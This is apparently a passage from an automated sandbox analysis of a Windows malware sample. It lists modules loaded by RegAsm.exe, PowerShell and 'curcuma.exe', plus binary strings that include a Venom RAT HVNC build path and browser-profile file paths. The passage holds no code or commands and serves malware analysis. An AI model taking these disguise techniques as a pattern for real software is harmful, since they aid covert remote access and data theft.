                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: cryptnet.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: webio.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: cabinet.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: devenum.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: devobj.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: msdmo.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: avicap32.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: msvfw32.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: mmdevapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: webio.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\ADFoyxP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: ADFoyxP.exeStatic file information: File size 3665550 > 1048576
                  Source: ADFoyxP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: _C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2: source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: a\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1 source: curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: curcuma.exe, 00000024.00000003.2136454480.000002428F022000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000001E.00000000.1653142985.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: rnlmp.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191568059.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192182151.000002428F010000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: curcuma.exe, 00000024.00000002.2527246365.0000024290062000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530022848.0000024290662000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2536660358.0000024291C6B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2527784177.0000024290261000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522353065.000002428F26C000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2523595193.000002428F666000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532167366.0000024290C69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2531363274.0000024290A69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2539552200.000002429266A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535169251.0000024291663000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530698002.000002429086D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535663229.0000024291861000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2533565678.0000024291069000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2540211351.0000024292860000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2524330039.000002428F86F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522991819.000002428F460000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532744179.0000024290E63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2537654371.0000024292064000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534825398.0000024291461000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2526786825.000002428FE63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534240303.000002429126B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2wek source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455612672.000002428F08B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455235376.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: r\AppData\Local\Temp\Symbols\ntkrnlmp.pdbR7 source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.inic source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455235376.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB90 source: curcuma.exe, 00000024.00000003.2455612672.000002428F08B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ]\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2^ source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mp.pdb source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bols\winload_prod.pdb source: curcuma.exe, 00000024.00000003.2457464322.000002428EFDA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455703181.000002428EFDA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455235376.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: a\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1n source: curcuma.exe, 00000024.00000003.2455612672.000002428F08B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2I" source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2194578503.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192812190.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2193070120.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192580961.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: "winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428EFDE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2194578503.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192812190.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2193070120.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192580961.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58315"G source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2194578503.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192812190.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2193070120.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192580961.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58313 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: jC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\<,[ source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: curcuma.exe, 00000024.00000002.2527246365.0000024290062000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530022848.0000024290662000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2536660358.0000024291C6B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2527784177.0000024290261000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522353065.000002428F26C000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2523595193.000002428F666000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532167366.0000024290C69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2531363274.0000024290A69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2539552200.000002429266A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535169251.0000024291663000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530698002.000002429086D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535663229.0000024291861000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2533565678.0000024291069000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2540211351.0000024292860000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2524330039.000002428F86F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522991819.000002428F460000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532744179.0000024290E63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2537654371.0000024292064000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534825398.0000024291461000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2526786825.000002428FE63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534240303.000002429126B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: pnaclmp.pdb source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Y\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831hO+ source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2#"I source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000001E.00000000.1653142985.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: Temp\Symbols\ntkrnlmp.pdbD source: curcuma.exe, 00000024.00000003.2455703181.000002428EFDA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdba source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbs source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: xC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
